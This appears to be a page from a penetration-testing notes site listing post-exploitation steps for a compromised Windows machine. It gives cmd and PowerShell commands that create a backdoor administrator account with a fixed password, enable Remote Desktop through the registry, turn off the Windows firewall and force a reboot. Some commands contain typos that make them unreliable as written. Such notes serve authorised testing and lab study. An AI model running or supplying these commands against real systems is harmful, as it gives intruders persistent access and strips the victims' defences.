Post Exploitation

Must DO Steps after getting shell in windows machine

1. Add a new user

net user AdminTest password@123 /add

2. Add a user to Administrator Group

net localgroup Administrators AdminTest /add

3. Enable Remote Desktop

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d /0 /f

this sets 'fDenyTSConnection' to '0', enabling Remote Desktop

4. Turn Off Windows Firewall

netsh advfirewall set all profiles state off

5. Restart

shutdown /r /t 0 /f

Powershell Alternative

1. Add a user "AdminTest"

New-LocalUser -Name "AdminTest" -Password (ConvertTo-SecureString "password@123" -AsPlainText -Force) -FullName "Admin Test User" -Description "Admin Test Account"

2. Add a user to Administrator Group

Add-LocalGroupMember -Group "Administrator" -Member "AdminTest"

3. Enable Remote Desktop

Set-ItemPropery 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0

this sets 'fDenyTSConnection' to '0', enabling Remote Desktop

4. Allow RDP through Firewall

Enable-NetFirewallRule -Group "Remote Desktop"

5. Turn Off Windows Firewall

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

PreviousMounting VHD and VHDX NextShutDown and Reboot Options in Windows

Last updated 18 days ago